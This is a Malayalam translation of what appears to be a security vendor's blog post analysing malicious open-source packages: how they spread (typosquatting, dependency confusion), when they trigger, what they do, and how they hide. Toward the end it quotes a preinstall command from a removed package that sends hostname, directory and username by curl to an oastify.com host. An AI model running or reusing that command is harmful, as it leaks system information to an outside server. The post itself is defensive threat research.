മുൻ എപ്പിസോഡിൽ, ഓപ്പൺ സോഴ്സ് ക്ഷുദ്ര പാക്കേജുകൾ: പ്രശ്നംഭീഷണി ഉയർത്തുന്നവർ എന്തുകൊണ്ടാണ് ഇത്രയധികം എന്ന് ഞങ്ങൾ ചർച്ച ചെയ്തു. പുതിയ ക്ഷുദ്ര ഘടകങ്ങൾ പ്രസിദ്ധീകരിക്കുന്നതിനോ നിലവിലുള്ള ഘടകങ്ങളുടെ ഏറ്റവും പുതിയ പതിപ്പുകളിൽ ക്ഷുദ്രവെയർ കുത്തിവയ്ക്കുന്നതിനോ ആവേശം കാണിക്കുന്നു: ഓപ്പൺ സോഴ്സ് ഇൻഫ്രാസ്ട്രക്ചർ എവിടെയും ആർക്കും ഒരു എഫെമെറൽ അക്കൗണ്ട് സൃഷ്ടിക്കാൻ അനുവദിക്കുന്നു. ഒരു കമ്പോണന്റ് രജിസ്ട്രിയിൽ (NPM, PyPI, Docker Hub അല്ലെങ്കിൽ Visual Studio Marketplace പോലുള്ളവ) അല്ലെങ്കിൽ സഹകരണ വികസന പ്ലാറ്റ്ഫോമിൽ (GitHub പോലുള്ളവ). ചെലവൊന്നുമില്ല, കൂടാതെ മൂന്നാം കക്ഷി ഘടകങ്ങളിൽ സോഫ്റ്റ്വെയർ ടീമുകൾ പരമ്പരാഗതമായി പുലർത്തുന്ന അധിക വിശ്വാസം പ്രയോജനപ്പെടുത്തുന്നതിനുള്ള നിരവധി അവസരങ്ങളും.
ഓപ്പൺ സോഴ്സിന് ലഭ്യമായ ഇൻഫ്രാസ്ട്രക്ചർ ഉപയോഗിച്ച് ആക്രമണകാരികൾക്ക് മാൽവെയർ വിതരണം ചെയ്യുന്നത് എത്ര എളുപ്പമാണ് എന്നതും, സോഫ്റ്റ്വെയർ വികസിപ്പിക്കുന്ന സ്ഥാപനങ്ങൾക്ക് (എല്ലാവർക്കും?) മാൽവെയർ ബാധിക്കാതിരിക്കാൻ (മറ്റുള്ളവർക്ക് അവർ വിതരണം ചെയ്യുന്ന സോഫ്റ്റ്വെയറിൽ മാൽവെയർ വിതരണം ചെയ്യുന്നത്) എത്രത്തോളം ബുദ്ധിമുട്ടാണ് എന്നതും തമ്മിലുള്ള അസമമിതി, കഴിഞ്ഞ വർഷം മാലിഷ്യസ് പാക്കേജുകളുടെ എണ്ണം കാൽ മില്യൺ കവിയാൻ കാരണമായി.
ഒരു സംഘടനയ്ക്കും പരിഹരിക്കാൻ കഴിയാത്തത്ര വലിയ ഒരു പ്രശ്നമാണിത്, വിശ്വാസ്യത, സെക്യൂർ-ബൈ-ഡിഫോൾട്ട്, സെക്യൂർ-ബൈ-ഡിസൈൻ തത്വങ്ങൾ, ഘടകങ്ങളുടെ ജീവിതചക്രം എന്നിവയെക്കുറിച്ചുള്ള ഓപ്പൺ സോഴ്സ് പ്രക്രിയയെ പുനഃക്രമീകരിക്കുന്ന പ്രക്രിയയിലാണ് സമൂഹം. അടുത്ത എപ്പിസോഡിൽ അത്തരം ആശയങ്ങൾ നമുക്ക് പരിശോധിക്കാം. ഓപ്പൺ സോഴ്സ് ക്ഷുദ്ര പാക്കേജുകളിൽ നിന്ന് പരിരക്ഷിക്കൽ: എന്താണ് (പ്രവർത്തിക്കുന്നില്ല).
നമ്മൾ സംസാരിക്കുന്നത് മിക്കപ്പോഴും പൊരുത്തപ്പെടുന്ന സോഫ്റ്റ്വെയർ ഘടകങ്ങളെക്കുറിച്ചാണെന്ന് ഓർമ്മിക്കുക സോഫ്റ്റ്വെയർ പാക്കേജുകൾ: വീണ്ടും ഉപയോഗിക്കാവുന്ന ഘടകങ്ങൾ ഒരു സോഫ്റ്റ്വെയർ മാനിഫെസ്റ്റിൽ ഒരു ആശ്രിതത്വമായി പരാമർശിക്കാവുന്ന തരത്തിൽ പായ്ക്ക് ചെയ്ത്, ഒരു പാക്കേജ് മാനേജർ അല്ലെങ്കിൽ ബിൽഡ് ടൂൾ ഉപയോഗിച്ച് ഇൻസ്റ്റാൾ ചെയ്തു. പൊതുജനങ്ങളെ ഉൾപ്പെടുത്തുന്നതിനായി ഈ കേസ് വികസിപ്പിക്കാൻ കഴിയുമെന്ന് ദയവായി ശ്രദ്ധിക്കുക. കണ്ടെയ്നർ ചിത്രങ്ങൾ (കണ്ടെയ്നർ റൺടൈമുകളും കുബേർനെറ്റസ് പോലുള്ള ഓർക്കസ്ട്രേഷൻ പ്ലാറ്റ്ഫോമുകളും ഉപയോഗിക്കുന്നു), കൂടാതെ സോഫ്റ്റ്വെയർ ഉപകരണങ്ങളിലേക്കുള്ള വിപുലീകരണങ്ങൾ (കെട്ടിടം, ഓട്ടോമേഷൻ, വിന്യാസം എന്നിവയ്ക്കായി).
ഇത് എങ്ങനെയാണെന്ന് ഇവിടെ നമ്മൾ വിശകലനം ചെയ്യുന്നു ദോഷകരമായ ഘടകങ്ങളെ അടിസ്ഥാനമാക്കിയുള്ള ആക്രമണ തന്ത്രം മുൻകാല ഉദാഹരണങ്ങളും മാൽവെയർ നേരത്തെയുള്ള മുന്നറിയിപ്പിനായുള്ള ഞങ്ങളുടെ പ്ലാറ്റ്ഫോമിൽ കണ്ടതും അനുസരിച്ച് പ്രവർത്തിക്കുന്നു. (MEW). വ്യത്യസ്ത അളവുകളിൽ ദോഷകരമായ ഘടകങ്ങൾ ഞങ്ങൾ വിശകലനം ചെയ്യും:
(1) വിതരണത്തിനായി തിരഞ്ഞെടുത്ത രീതി (പുതിയതോ നിലവിലുള്ളതോ ആയ ഘടകത്തിൽ ഉപയോഗിക്കുന്ന രജിസ്ട്രി, പ്രസിദ്ധീകരിച്ച ഘടക പതിപ്പിനെ ബാധിക്കാൻ ഉപയോഗിക്കുന്ന സാങ്കേതികത), (2) മാൽവെയർ എങ്ങനെ സജീവമാകുന്നു അല്ലെങ്കിൽ പ്രവർത്തനക്ഷമമാകുന്നു, (3) ക്ഷുദ്രകരമായ പെരുമാറ്റം അതായത് എന്തൊക്കെ ദോഷകരമായ പ്രവർത്തനങ്ങൾ നിരീക്ഷിക്കപ്പെടുന്നു, ആക്രമണകാരിയുടെ പ്രചോദനം എന്താണ്, (4) അവ്യക്തമാക്കൽ, ശ്രദ്ധിക്കപ്പെടാതെ പോകുന്നതിന് ഒളിച്ചിരിക്കൽ, ലാറ്ററൽ മൂവ്മെന്റ്, കമാൻഡ് ആൻഡ് കൺട്രോൾ (C2) ഹോസ്റ്റുകളുമായുള്ള ആശയവിനിമയം മുതലായവയ്ക്ക് സാധാരണമായ സാങ്കേതിക വിദ്യകൾ ഏതാണ്; (5) ഇരകൾക്ക് ഘടകം ഇൻസ്റ്റാൾ ചെയ്യുന്നതിനായി മതിയായ ജനപ്രീതിയും വിശ്വാസവും നേടുന്നതിനുള്ള സാങ്കേതിക വിദ്യകൾ.
തിരഞ്ഞെടുത്ത വിതരണ സംവിധാനം
ഞങ്ങൾ ഒരു "പശ്ചാത്തല ശബ്ദം” പാക്കേജ് നാമത്തിൽ ഒരു അക്ഷരത്തെറ്റ് ഉള്ളതിനാൽ ജാഗ്രതയില്ലാത്ത ഡെവലപ്പർമാരെ അവരുടെ ആശ്രിതത്വത്തിനായി ഫിഷ് ചെയ്യുന്നതിന് ടൈപ്പോസ്ക്വാട്ടിംഗ് ഉപയോഗിക്കുന്ന സങ്കീർണ്ണമല്ലാത്ത ദോഷകരമായ പാക്കേജുകളുടെ ഒരു പരമ്പര. പല ജനപ്രിയ പാക്കേജുകളിലും സമാനമായ പേരുള്ള അക്ഷരത്തെറ്റുകളുള്ള പാക്കേജുകളുടെ ഒരു കൂട്ടം ലഭിക്കുന്നു, അവ ജാഗ്രതയില്ലാത്ത ചില ഡെവലപ്പർമാരെ ഫിഷ് ചെയ്യുമെന്ന പ്രതീക്ഷയോടെ.
അവർ ഒരു എഫെമെറൽ അക്കൗണ്ട് ഉപയോഗിക്കുന്നു, ഒരു കൂട്ടം ടൈപ്പോസ്ക്വാറ്റ് പാക്കേജുകൾ പ്രസിദ്ധീകരിക്കുന്നു, മറ്റൊന്ന് സൃഷ്ടിക്കുന്നു, മറ്റൊരു ഗ്രൂപ്പ് പ്രസിദ്ധീകരിക്കുന്നു... കുറച്ച് ഓട്ടോമേഷനും ചാതുര്യവും ഉപയോഗിച്ച് അവർക്ക് കുറച്ച് സങ്കീർണ്ണത നേടാൻ കഴിയും, പക്ഷേ സാധാരണയായി അവ വളരെ നിസ്സാരമാണ്. ഞങ്ങൾ അവരെ ആന്തരികമായി വിളിക്കുന്നു "ആഞ്ചിവിക്രെഡൻഷ്യലുകൾ മോഷ്ടിക്കുക എന്നതാണ് പ്രധാന ലക്ഷ്യം, എന്നാൽ ചിലപ്പോഴൊക്കെ സ്പൈവെയർ സോഴ്സ് കോഡ് അല്ലെങ്കിൽ വ്യക്തിഗത തിരിച്ചറിയൽ വിവരങ്ങൾ (PII), ക്ലിപ്പ്ബോർഡ് ക്യാപ്ചർ, മറ്റ് സംശയങ്ങൾ എന്നിവ പോലുള്ള സെൻസിറ്റീവ് ഡാറ്റ പുറന്തള്ളുന്നത് ഞങ്ങൾ കണ്ടെത്താറുണ്ട്.
പെട്ടെന്ന് പ്രത്യക്ഷപ്പെടുന്ന, കൂടുതൽ സങ്കീർണ്ണമായ ദോഷകരമായ ഘടകങ്ങളായ "സ്രാവുകൾ" നമുക്ക് കാണാൻ കഴിയും. ഒരു ന്യൂനപക്ഷം പ്രത്യേക ഗ്രൂപ്പുകളെയോ ഓർഗനൈസേഷനുകളെയോ ലക്ഷ്യം വച്ചുള്ളതാണ്, സാധാരണയായി ക്രിപ്റ്റോ ഡ്രെയിനറുകൾ അല്ലെങ്കിൽ വെബ് സ്കിമ്മറുകൾ എന്നിവ സോപാധികമായി സജീവമാക്കപ്പെടുന്നു, ഒരുപക്ഷേ ഇതിൽ കാണുന്ന സമീപനം പിന്തുടരുന്നു. ഇവന്റ്-സ്ട്രീം സംഭവം ഒരു ടാർഗെറ്റ് പാക്കേജിൽ നിന്ന് പാക്കേജ് റഫർ ചെയ്യുമ്പോൾ മാത്രം ആക്രമണ പേലോഡ് ഡീക്രിപ്റ്റ് ചെയ്യുന്നതിന്റെ.
മികച്ചതും ഇപ്പോൾ ക്ലാസിക്തുമായ "" എന്ന പേപ്പറിൽ വിതരണ സംവിധാനം വിശകലനം ചെയ്തിട്ടുണ്ട്, ""ബാക്ക്സ്റ്റാബേഴ്സ് നൈഫ് കളക്ഷൻ: ഓപ്പൺ സോഴ്സ് സോഫ്റ്റ്വെയർ സപ്ലൈ ചെയിൻ ആക്രമണങ്ങളുടെ ഒരു അവലോകനം."", ഇത് തീർച്ചയായും വായിക്കേണ്ടതാണ്. തീർച്ചയായും നിങ്ങൾ ഈ മനോഹരമായ ചാർട്ട് മുമ്പ് കണ്ടിട്ടുണ്ടാകും:

പുതിയതും നിലവിലുള്ളതുമായ പാക്കേജുകൾ ഉൾപ്പെടെ എല്ലാ വഴികളും പരിശോധിച്ചു; സോഴ്സ് കോഡിനെയോ, ബിൽഡ് സിസ്റ്റത്തെയോ, പാക്കേജുചെയ്ത ഘടകത്തെയോ തന്നെ ബാധിക്കുന്നു; മോഷ്ടിച്ച ക്രെഡൻഷ്യലുകളോ സോഷ്യൽ എഞ്ചിനീയറിംഗോ ഉപയോഗിക്കുന്നു; ഉപേക്ഷിക്കപ്പെട്ട അക്കൗണ്ടുകളും റിപ്പോസിറ്ററികളും ഹൈജാക്ക് ചെയ്യുന്നു അല്ലെങ്കിൽ പരിപാലിക്കുന്നവയെ വിഷലിപ്തമാക്കുന്നു. ചില ആക്രമണങ്ങൾക്ക് പേരുകൾ ലഭിച്ചു (ടൈപ്പോസ്ക്വാട്ടിംഗ്, ആശ്രിതത്വ ആശയക്കുഴപ്പം, മാനിഫെസ്റ്റ് ആശയക്കുഴപ്പം, റെപ്പോ-ജാക്കിംഗ്മുതലായവ) ഇതിനകം മറ്റെവിടെയെങ്കിലും ചർച്ച ചെയ്തിട്ടുണ്ട്.
തിരഞ്ഞെടുത്ത രജിസ്ട്രികളെക്കുറിച്ച്?
മൊത്തം മാലിഷ്യസ് പാക്കേജുകളുടെ എണ്ണത്തിൽ NPM ഇപ്പോഴും മുന്നിലാണ്, എന്നാൽ ഈ വർഷം മുതൽ PyPI-യിൽ ഒരു കുതിച്ചുചാട്ടം ഞങ്ങൾ കണ്ടു. ഡാറ്റാ സയൻസിനും മെഷീൻ ലേണിംഗിനും പൈത്തൺ ഒരു ജനപ്രിയ ആവാസവ്യവസ്ഥയാണ്. വാസ്തവത്തിൽ, NPM-നേക്കാൾ PyPI-യിൽ മാൽവെയർ സാന്ദ്രത ഇപ്പോൾ കൂടുതലാണ്.
മാൽവെയർ എങ്ങനെ പ്രവർത്തനക്ഷമമാകുന്നു
ഇൻസ്റ്റാളേഷൻ സമയത്ത് 10-ൽ 4 കേസുകളിൽ മാത്രമേ ദോഷകരമായ പാക്കേജുകൾ ട്രിഗർ ചെയ്യപ്പെടാറുള്ളൂ (സമീപ വർഷങ്ങളിൽ ഇത് 10-ൽ 6-ന് അടുത്തായിരുന്നു). ബാക്കിയുള്ളവ റൺടൈമിൽ ദോഷകരമായ പെരുമാറ്റം പ്രവർത്തിപ്പിക്കുന്നു, ടെസ്റ്റുകൾ നടത്തുമ്പോൾ 100-ൽ 1 എണ്ണം ട്രിഗർ ചെയ്യപ്പെടുന്നു. പലയിടത്തും ഇൻസ്റ്റലേഷൻ സ്ക്രിപ്റ്റുകളുടെ അനിയന്ത്രിതമായ എക്സിക്യൂഷൻ പ്രവർത്തനരഹിതമാക്കിയിട്ടുണ്ടെന്ന് എതിരാളികൾക്ക് അറിയാമെന്ന് തോന്നുന്നു.
ദുഷ്ടന്മാർക്ക് എന്താണ് ലഭിക്കുന്നത്?
ക്ഷുദ്രകരമായ പെരുമാറ്റ വിഭാഗങ്ങൾ ഞങ്ങൾ പട്ടികപ്പെടുത്തും, ഏറ്റവും ജനപ്രിയമായത് ആദ്യം. ആഘാതം വളരെ വ്യത്യസ്തമായിരിക്കാമെന്ന് ദയവായി ശ്രദ്ധിക്കുക: a വൈപ്പർ ശാഠ്യപൂർവ്വം വിനാശകരമാണ്, പക്ഷേ ഇത് സാധാരണമല്ല, ലക്ഷ്യമിട്ട സൈബർ യുദ്ധ കാമ്പെയ്നുകൾ അല്ലെങ്കിൽ ക്രൂരമായ ഹാക്ക്ടിവിസവുമായി ബന്ധപ്പെട്ട ചുരുക്കം ചില കേസുകളിൽ മാത്രമേ ഇത് കണ്ടിട്ടുള്ളൂ. ഇനിപ്പറയുന്ന വിഭാഗങ്ങൾ വളരെ സാധാരണമാണ്:
- ഇൻഫോസ്റ്റീലർ / ക്രെഡൻഷ്യൽ ഡ്രെയിനർ. ഏറ്റവും കൂടുതൽ സംഭവിക്കുന്നത്, 90%-ത്തിലധികവും സങ്കീർണ്ണമല്ലാത്ത ആക്രമണങ്ങളാണ്, പ്രധാനമായും പാസ്വേഡുകൾ, ആക്സസ് ടോക്കണുകൾ, API കീകൾ, സ്വകാര്യ കീകൾ (SSH മുതലായവ) പോലുള്ള ക്രെഡൻഷ്യലുകൾക്കായി തിരയുന്ന ലളിതമായ മോഷണക്കാരാണ്. ഇത് എഴുതാൻ ഏറ്റവും എളുപ്പമായിരിക്കും (വൈപ്പറുകളോടൊപ്പം?). അവർ അറിയപ്പെടുന്ന ഫയലുകൾ/ഡയറക്ടറികളും മറ്റ് ഉറവിടങ്ങളും (ഉദാ: രജിസ്ട്രി കീകൾ) എണ്ണുന്നു, ഉള്ളടക്കങ്ങൾ പാക്കേജുചെയ്യുന്നു, ആ ഡാറ്റ ഒരു C2 സെർവറിലേക്ക് അയയ്ക്കുന്നു. ആശയം ലളിതമാണ്: "ഫിഷിംഗ് ക്രെഡൻഷ്യലുകൾക്കായി ഞാൻ ഒരു സ്റ്റീലർ പ്രസിദ്ധീകരിക്കുന്നു, അതിനാൽ പിന്നീട് ഒരു ഡയറക്ടഡ് ആക്രമണം ആരംഭിക്കുന്നതിന് എനിക്ക് ക്രെഡൻഷ്യലുകൾ ഉപയോഗിക്കാം".
നിരീക്ഷിക്കപ്പെടുന്ന C2 നെറ്റ്വർക്കിംഗ് സാധാരണയായി വിലകുറഞ്ഞതും വൃത്തികെട്ടതുമാണ്, ടെലിഗ്രാം ചാനലുകൾ പോലെയോ എൻഗ്രോക്ക് പോലുള്ള ടണലിംഗ് ഉപകരണങ്ങൾ (പലപ്പോഴും VPN എഗ്രസ് ഐപികൾ വഴി റിവേഴ്സ് പ്രോക്സികളുടെ രൂപത്തിൽ തുറന്നുകാട്ടപ്പെടുന്നു). നൂറുകണക്കിന് (!) സാധ്യതകളുണ്ട്, നിരവധി GitHub പ്രോജക്ടുകൾക്ക് കീഴിൽ പാസ്വേഡ് മോഷ്ടിക്കുന്ന വിഷയം. കീലോഗറുകൾ പോലുള്ള സ്പെഷ്യലൈസേഷനുകൾ മാലിഷ്യസ് പാക്കേജുകൾക്കും കണ്ടെയ്നർ ഇമേജുകൾക്കും അപൂർവമാണ്, പക്ഷേ ഉപയോക്തൃ ഇടപെടൽ പ്രതീക്ഷിക്കുന്ന ടൂൾ എക്സ്റ്റൻഷനുകളിൽ ഇത് കൂടുതൽ സാധാരണമാണ്.
- ഡ്രോപ്പർ / ഡൗൺലോഡർ. ജനപ്രീതിയിൽ രണ്ടാമത്തേത്, സാധാരണയായി മൾട്ടി-സ്റ്റേജ് ആക്രമണങ്ങളിൽ ഒന്നാമതായി വരുന്നു. മൂന്നിൽ ഒന്നിൽ കൂടുതൽ ക്ഷുദ്ര ഘടകങ്ങളിൽ ഡ്രോപ്പറുകൾ (ക്ഷുദ്രകരമായ പേലോഡ് പാക്കേജിൽ ഉൾപ്പെടുത്തിയിട്ടുണ്ടെങ്കിൽ) അല്ലെങ്കിൽ ഡൗൺലോഡറുകൾ (പേലോഡ് ആക്രമണകാരിയുടെ നിയന്ത്രണത്തിലുള്ള ഒരു എൻഡ്പോയിന്റിൽ നിന്നാണ് ഡൗൺലോഡ് ചെയ്യുന്നത്) ഉണ്ട്. പേലോഡ് പലപ്പോഴും അറിയപ്പെടുന്ന ഒരു ബൈനറി മാൽവെയർ വേരിയന്റാണ്, കൂടാതെ ബാക്ക്ഡോറുകൾ, സ്പൈവെയർ, ക്രിപ്റ്റോ ഡ്രെയിനറുകൾ, മറ്റ് ഉപയോഗ കേസുകൾ എന്നിവ ഇൻസ്റ്റാൾ ചെയ്യുന്നതിനായി ഇത് പ്രവർത്തിപ്പിക്കുകയും ചിലപ്പോൾ നിലനിൽക്കുകയും ചെയ്യുന്നു. ഡൗൺലോഡ് ചെയ്തതോ വിന്യസിച്ചതോ ആയ പേലോഡ് നിലവിലുള്ള മാൽവെയർ ബൈനറികൾ നൽകുന്ന എല്ലാ ശക്തിയും ഉപയോഗിച്ച് രണ്ടാം ഘട്ട ആക്രമണം ആരംഭിക്കുന്നു. അപ്രതീക്ഷിത സൈറ്റുകളിലേക്ക് കണക്റ്റുചെയ്യുമ്പോൾ കണ്ടെത്തൽ ഒഴിവാക്കാൻ, ബൈനറികൾ പാക്കേജിനുള്ളിൽ വിതരണം ചെയ്യാൻ കഴിയും, പലപ്പോഴും ചിത്രങ്ങളായോ നിരുപദ്രവകരമെന്ന് കരുതപ്പെടുന്ന ഫയൽ തരങ്ങളായോ വേഷംമാറി.
- ക്രിപ്റ്റോകറൻസി മോഷ്ടിക്കുന്നവർ / ഖനിത്തൊഴിലാളികൾ. സാമ്പത്തികമായി പ്രചോദിതരായ എതിരാളികൾ നിങ്ങളുടെ ക്ലൗഡ് അസറ്റുകൾ ഉപയോഗിച്ച് ക്രിപ്റ്റോമൈനറുകൾ പ്രവർത്തിപ്പിക്കാൻ തയ്യാറാണ് (അവർ ഒരു ക്ലൗഡ് VM-ൽ പ്രവർത്തിക്കുന്നുണ്ടോ എന്ന് പോലും അവർ കണ്ടെത്തുന്നു). അവർക്ക് ഇതിനെക്കുറിച്ച് താൽപ്പര്യമില്ല കുറഞ്ഞ ലാഭ അനുപാതം മോഷ്ടിക്കപ്പെട്ട ക്ലൗഡ് ഇൻഫ്രാസ്ട്രക്ചറിനായി ഇരയിൽ നിന്ന് ഈടാക്കുന്ന ഓരോ $53 നും $1 വീതം. അപ്രതീക്ഷിത ബിൽ ലഭിക്കുന്നതുവരെ ഇരകൾക്ക് ഇതിനെക്കുറിച്ച് അറിയില്ലായിരിക്കാം. ഭാഗ്യവശാൽ, ഇത് വന്നു പോകുന്നു. ച്ര്യ്പ്തൊജച്കിന്ഗ് ക്ഷുദ്രകരമായ പാക്കേജുകളിലെ കാമ്പെയ്നുകൾ ഇടയ്ക്കിടെ പോപ്പ് അപ്പ് ചെയ്യുകയും പിന്നീട് മങ്ങുകയും ചെയ്യുന്നു, വാലറ്റ് ഉപയോക്താക്കൾക്കായി ഫിഷിംഗ് നടത്തുകയോ ഒടുവിൽ വാലറ്റ് ദാതാവിനെ ലക്ഷ്യം വയ്ക്കുകയോ ചെയ്യുന്നു, ലെഡ്ജർ ആക്രമണം.
മറ്റ് പെരുമാറ്റരീതികൾ, വിന്യസിക്കുന്നത് പോലെയുള്ളവ a പിൻ വാതിൽ മുൻകാലങ്ങളെ അപേക്ഷിച്ച് ഇപ്പോൾ റിമോട്ട് കോഡ് എക്സിക്യൂഷന് റിവേഴ്സ് ഷെൽ തുറക്കുന്നത് കുറവാണ്. ഉദാഹരണത്തിന്, 123rf_കോൺട്രിബ്യൂട്ടർ_വെബ് പാക്കേജ് (ഇപ്പോൾ രജിസ്ട്രിയിൽ നിന്ന് നീക്കം ചെയ്തിരിക്കുന്നു) ഒരു അവ്യക്തതയും കൂടാതെ തുറക്കുന്നു, അതിൽ നിന്ന് പകർത്തി ഒട്ടിച്ച ഒരു റിവേഴ്സ് ഷെൽ റിവേഴ്സ് ഷെൽ ചീറ്റ് ഷീറ്റ്:

നിയമാനുസൃതവും ദോഷകരവുമായ ഘടകങ്ങൾക്ക് പുറമേ, ഇനിപ്പറയുന്നവ ഉൾപ്പെടെ നിരവധി ദുരുപയോഗങ്ങളും ഞങ്ങൾ നിരീക്ഷിച്ചിട്ടുണ്ട്:
സ്പാം പാക്കേജുകൾ
ആയിരക്കണക്കിന് ചെറിയ പാക്കേജുകൾ NPM-ൽ ഉണ്ട്, അവയിൽ ഭൂരിഭാഗവും മാൽവെയർ ഇല്ല, പക്ഷേ എളുപ്പത്തിൽ വരുമാനം നേടാമെന്ന് വാഗ്ദാനം ചെയ്യുന്നു, സ്നേക്ക് ഓയിൽ, വയാഗ്ര ഓഫറുകളിലേക്കുള്ള ലിങ്കുകൾ, അങ്ങനെ എല്ലാം. കുറച്ച് ഉപയോക്താക്കൾ അത്തരം സ്പാം പ്രസിദ്ധീകരിക്കുകയും രജിസ്ട്രിയിൽ നിന്ന് ധാരാളം ബാൻഡ്വിഡ്ത്ത് എടുക്കുകയും ചെയ്യുന്നു. ഇന്തോനേഷ്യയിൽ നിന്നുള്ള മറ്റൊരു നടൻ(കൾ) ഇതിൽ നിന്ന് നേട്ടമുണ്ടാക്കാൻ ശ്രമിച്ചു. ടീ റാങ്ക് ദുരുപയോഗം ചെയ്യുന്നു അനുബന്ധ GitHub ഡമ്മി റിപ്പോസിറ്ററികളുള്ള പതിനായിരക്കണക്കിന് പരസ്പരബന്ധിതമായ NPM പാക്കേജുകൾ സൃഷ്ടിച്ചുകൊണ്ട്, ഓപ്പൺ സോഴ്സ് ഡെവലപ്പർമാർക്ക് നഷ്ടപരിഹാരം നൽകാൻ ഉദ്ദേശിച്ചുള്ളതാണ്. ഇത് ഉപയോഗ നിബന്ധനകളുടെ വ്യക്തമായ ലംഘനമാണ്.
ബഗ് ബൗണ്ടിയും സുരക്ഷാ ഗവേഷണ തട്ടിപ്പുകളും
ബഗ് ബൗണ്ടി പ്രോഗ്രാമുകൾക്കായുള്ള സുരക്ഷാ പിഴവുകൾ കണ്ടെത്തുകയോ ആവാസവ്യവസ്ഥയുടെ ചില വശങ്ങൾ ഗവേഷണം ചെയ്യുകയോ പോലുള്ള നല്ല ഉദ്ദേശ്യങ്ങൾക്കായി ഡാറ്റ പുറന്തള്ളുന്നതായി ഒരു പാക്കേജ് സ്വയം വിശേഷിപ്പിക്കുമ്പോൾ. ഈ വിഭാഗത്തിൽ ആയിരക്കണക്കിന് പാക്കേജുകൾ ഞങ്ങൾ കണ്ടിട്ടുണ്ട്, അവ PortSwigger-ൽ നിന്നുള്ള (ഉദാ. oastify.com ഡൊമെയ്നിലെ ഹോസ്റ്റ്) ഒരു Burp Collaborator വിലാസത്തിലേക്ക് തിരിച്ചറിയൽ ലഭ്യമാക്കുന്നു, പക്ഷേ വളരെ സെൻസിറ്റീവ് അല്ലാത്ത ഡാറ്റ. പലപ്പോഴും കോപ്പിക്യാറ്റുകൾ ഞങ്ങൾ നിരീക്ഷിച്ചു. ആശ്രിതത്വ ആശയക്കുഴപ്പം അലക്സ് ബിർസന്റെ ആശയത്തിന്റെ തെളിവ്, പോലെ അറോറ-വെബ്മെയിൽ-പ്രൊ പാക്കേജ് (രജിസ്ട്രിയിൽ നിന്ന് നീക്കം ചെയ്തു), ഇത് പ്രീ-ഇൻസ്റ്റാൾ സ്ക്രിപ്റ്റിൽ ഈ മോശം കോഡ് പ്രവർത്തിപ്പിക്കുന്നു:
exec("a=$(hostname; pwd; whoami; echo 'aurora-webmail-pro'; curl http://kmauspo6z5noqllvwu0oj6lqahg84ysn.oastify.com/;) && echo $a | xxd -p | head | while read ut; do curl -k -i -s http://kmauspo6z5noqllvwu0oj6lqahg84ysn.oastify.com/$ut;done") കൂടാതെ ഒരു “ഇത് സിമ്പിൾ ഡിപൻഡൻസി കൺഫ്യൂഷൻ അറ്റാക്ക് പ്രൂഫ് ഓഫ് കൺസെപ്റ്റ് ആണ്.” എന്നതിലെ നിരാകരണ വിവരണം package.json. ദുരുദ്ദേശ്യമില്ലാതെ പോലും ഇത് സേവന നിബന്ധനകളുടെ വ്യക്തമായ ലംഘനമാണ്.
നല്ല വാർത്തയുണ്ടോ? ക്ഷുദ്രകരമായ ഘടകങ്ങൾ വഴി റാൻസംവെയർ ആക്രമണങ്ങൾ നടക്കുന്നതായി (ഇതുവരെ) നമ്മൾ കണ്ടിട്ടില്ല. അജ്ഞാതമായ കാരണങ്ങളാൽ, സൈബർ കുറ്റവാളികൾ കൂടുതൽ പരമ്പരാഗത ഇമെയിൽ ഫിഷിംഗ്, RDP-അധിഷ്ഠിത, ഡ്രൈവ്-ബൈ ഡൗൺലോഡ് ഡെലിവറി സംവിധാനങ്ങൾ ഇഷ്ടപ്പെടുന്നതായി തോന്നുന്നു.
നിരീക്ഷിച്ച അധിക സാങ്കേതിക വിദ്യകൾ

സ്ഥിരത, പ്രതിരോധ ഒഴിഞ്ഞുമാറൽ, വിവര ശേഖരണം, കമാൻഡ് & കൺട്രോൾ ഹോസ്റ്റുകളുമായുള്ള ആശയവിനിമയം, പുറന്തള്ളൽ എന്നിവയ്ക്കായി നിരവധി സാങ്കേതിക വിദ്യകൾ ഉപയോഗിച്ചു.
ദൃഢത രണ്ടാം ഘട്ട ബൈനറി മാൽവെയറിലെ പെർസിസ്റ്റൻസ് സവിശേഷതകൾ ഉപയോഗിച്ചാണ് ക്ഷുദ്ര ഘടകങ്ങളിൽ ഡാറ്റ നേടുന്നത്, എന്നാൽ ചിലപ്പോൾ സ്വഭാവം പാക്കേജ് കോഡിലാണ് സ്ഥിതി ചെയ്യുന്നത്, ഷെഡ്യൂൾ ചെയ്ത ടാസ്ക്കുകളും വിൻഡോസ് രജിസ്ട്രിയിലെ മാറ്റങ്ങളുമാണ് ഏറ്റവും സാധാരണമായത്.
അശ്ലീലത സാധാരണമാണ്, പക്ഷേ സങ്കീർണ്ണമല്ല. മിക്ക ടൈപ്പോസ്ക്വാട്ടിംഗ് പാക്കേജുകളും (“ആഞ്ചിവി?) ഒബ്ഫസ്കേഷൻ ഒട്ടും ഉപയോഗിക്കരുത്; പലരും നിസ്സാരമായവ (base64/hex എൻകോഡിംഗ് അല്ലെങ്കിൽ rot13 പോലുള്ള സബ്സ്റ്റിറ്റ്യൂഷൻ സൈഫറുകൾ) ഉപയോഗിക്കുന്നു അല്ലെങ്കിൽ ലഭ്യമായ കോഡ് ഒബ്ഫസ്കേറ്ററുകളും മിനിഫിക്കേഷനും ഉപയോഗിക്കുന്നു, ഇത് ശരിയായ ടൂളിംഗ് ഉപയോഗിച്ച് എളുപ്പത്തിൽ റിവേഴ്സ് ചെയ്യാൻ കഴിയും. "സ്രാവുകൾ" മാത്രമേ റിയൽ, ഹാർഡ്-കോർ, ഒബ്ഫസ്കേഷൻ, റിവേഴ്സ്-എഞ്ചിനീയർ ചെയ്യാൻ പ്രയാസമുള്ളവ ചെയ്യുന്നുള്ളൂ.
